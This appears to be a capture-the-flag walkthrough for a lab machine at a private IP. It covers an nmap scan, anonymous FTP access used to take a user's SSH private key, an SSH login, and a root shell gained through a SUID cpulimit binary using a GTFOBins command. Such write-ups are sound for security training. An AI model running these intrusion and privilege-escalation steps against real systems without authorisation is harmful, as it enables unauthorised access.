sudo nmap 192.168.172.130 -p- -sS -sV
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
61000/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP on the host is open to anonymous login. When logged in use ls -la to view hidden files. Upon moving into the .hannah directory ensure binary mode is enabled then grab the id_rsa.
.png)
Ensure to change the permissions on the id_rsa to make it usable.
chmod 600 id_rsa
Then proceed to login as the user hannah specifying port 61000.
ssh -p 61000 -i id_rsa [email protected]
.png)
Running linpeas on the target machine after transferring over finds the binary cpulimit has a SUID bit set.
.png)
Checking GTFOBins against this binary reports the following:
.png)
We can then use the following command to gain a root shell:
/usr/bin/cpulimit -l 100 -f -- /bin/sh -p
.png)